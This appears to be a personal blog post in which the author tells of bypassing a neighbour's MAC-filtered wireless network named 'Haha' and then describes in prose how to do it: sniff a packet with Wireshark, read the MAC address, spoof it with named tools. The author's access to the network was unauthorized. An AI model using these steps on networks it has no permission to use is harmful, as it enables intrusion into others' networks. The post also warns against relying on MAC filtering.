You have heard me talk about how easy it is to break wireless encryption, and yes, it is easy. Every time I write an article that mentions this someone invariably asks me if I can tell them how to break some type of wireless encryption. If they're my friends, and they have a legitimate reason I'll do it for them and not tell them how. If its a random stranger my answer is always “I cant do that, but I can point you to a website that has some utilities that might be able to help you out.” Strangely enough, a link to that site is on the side of my webpage... (hint, it rhymes with binsecure and ends with .org...)
Usually unless I am in dire need of the Internet and have no connection close by (like a starbucks or my house) I don't do any encryption cracking. In fact, I think I have done so only once outside my home lab. However, a few weeks ago I ran across a new wireless network in my apartment complex. This new wireless network was named “Haha.”
I was intrigued, usually a person puts down something like “Michelle's network” or “home wireless” or some equally uninformative name. The younger among us may put down something funny (I myself am particular to kawaii or kitanai). But Haha? I had to check it out. So I tried to connect to it, and failed. So I tried again, and failed... There was no encryption, should have been a breeze...
In a flash it hit me, this person was using MAC filtering as his security. Suddenly it all made sense, Haha was a taunt to people that thought they could connect to an unsecured connection. Personally, his “security” just made me laugh as I fired up wireshark, captured a few packets and connected to his network.
I didn't do anything malicious (and if I ever hear of friends doing something malicious to someones network I kick them... don't make me come after you and kick you...). However, I was sorely tempted.
What does that story have anything to do with not telling people how to crack wireless encryption? Well, I'm going to break that rule slightly and tell you how to crack MAC filtering (only slightly because MAC filtering is just a joke).
MAC filtering is the easiest wireless security to break, and should never be used without some other type of protection. MAC filtering allows or denies access to the WAP based on your wireless cards MAC address. Your MAC address is a 12 digit hex number that is unique to your network card. 00-0f-00-3b-a2-7e is an example of a MAC address. The first group of 3 numbers represents the manufacture of the NIC (00-0f-00). The last three groups represents the NIC specifically (3b-a2-7e).
This seems like the perfect solution, only the people you want can connect to your network, and there is no long password to remember. The problem being is that your MAC address is sent as plain text in the header of any IP packet you send.
So all you need to do is capture just one packet being sent to the WAP, find the MAC address in the header and spoof the MAC address of your wireless NIC. To capture packets use wireshark (if you use linux. As far as I know you cant sniff packets to a network your not connected to when you use windows). Once you find the correct MAC address just use a program to spoof your MAC address and connect to the WAP (programs that will do this for you are macshift, etherchange or Technitium MAC Address Changer just to name a few (links)).
- What can MAC filtering do for you?